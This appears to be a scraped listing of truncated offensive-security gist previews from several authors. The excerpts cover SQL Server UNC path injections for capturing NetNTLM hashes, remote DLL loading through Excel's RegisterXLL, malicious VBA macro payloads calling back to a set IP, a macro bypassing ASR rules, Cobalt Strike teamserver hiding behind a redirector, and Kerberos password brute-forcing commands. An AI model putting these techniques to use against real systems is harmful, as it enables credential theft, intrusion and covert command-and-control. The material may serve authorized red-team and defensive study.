pjendrusik

// add to ~/.ssh/config

ControlMaster auto
ControlPath /tmp/%r@%h:%p
ControlPersist yes

nullbind

This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account 
has sysadmin privileges by default in all versions of SQL Server.

Note: This list is most likely not complete.

-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role 
-----------------------------------------------------------------------

ryhanson

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

infosecn1nja

Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrators Rights

mgeeky

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

0. Page substiution macro for luring user to click Enable Content
1. The Unicorn Powershell based payload

infosecn1nja

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

infosecn1nja

APT Group/Red Team Weaponization Phase
=======================================

C2 tools : 
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit

infosecn1nja

Make a rule that allows port 80/443 access only from redirector:

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

rvrsh3ll

#!/usr/bin/env python2.7
import argparse
import binascii
import sys
import base64
import hashlib
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import random
from random import randint